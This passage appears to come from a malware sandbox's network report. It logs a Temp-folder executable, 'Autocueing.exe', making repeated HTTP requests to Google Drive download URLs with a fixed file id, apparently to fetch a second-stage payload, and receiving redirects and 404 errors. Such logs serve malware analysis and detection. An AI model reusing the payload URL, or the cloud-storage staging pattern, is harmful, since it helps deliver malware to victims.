                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49964 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:03 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:04 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgQhF838aA3jiPeC49oif7aVjz1vtYuDsOlRSZlW8XHrn4MOtjKr8-ICISBWEMMFr0d0
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:04 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-r_MFGG4hWH0BhbXJRdkGjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:28:04 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hVg3WieJkxuPxfS_feHZLw">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49973 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:05 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:05 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:05 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-bRs07ho7qTMamksRrfp2lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                    5 | 192.168.2.6 | 49981 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                    2025-01-11 04:28:06 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:06 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgSfJKVgMCjiq-Wy7DC58_igsZT8tx6OA-1n2rMKLxPXMRNSmtnv0DQQJ0N08Fac9M54
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:06 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-pmEw0zM6_DVKISqZevZ_hA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:06 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="L92x-aE-D2gr06ag7NFjzQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                    6 | 192.168.2.6 | 49988 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                    2025-01-11 04:28:07 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:07 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:07 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-ky10nF8d9mkPGnwpINLBug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                    7 | 192.168.2.6 | 49989 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                    2025-01-11 04:28:08 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:09 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgSHmeiN_O0VkbagjCrcxRMEFDZuBCKj-tAQT-tPceKOD6oP3fA-M1oZ2BFPY2PVpCdC
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:09 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-dgimboZauwRnVMK3mAnD9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:09 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZNbLESWnhmnbO_L77Wqbew">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                    8 | 192.168.2.6 | 49990 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                    2025-01-11 04:28:10 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:10 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:10 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-J-0ulqb91adqElQK1-GLhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                                    9           192.168.2.6  49991        142.250.185.129  443               5140  C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                                    2025-01-11 04:28:11 UTC  459                OUT        GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:11 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgQNJqNFDAFPq5uccp9dyEHmJbLd3u_jSWKhlaQz1jyQNp_-3166CoQf1G9r14W5fIuM
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:11 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-zpfcBhQWZ6FO5PeGKGq2zA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:11 UTC  1652               IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iQEs4Sjh9xdnGyZ6zwesSg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                                    10          192.168.2.6  49992        142.250.185.142  443               5140  C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                                                    2025-01-11 04:28:12 UTC  417                OUT        GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:12 UTC  1920               IN         HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:12 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
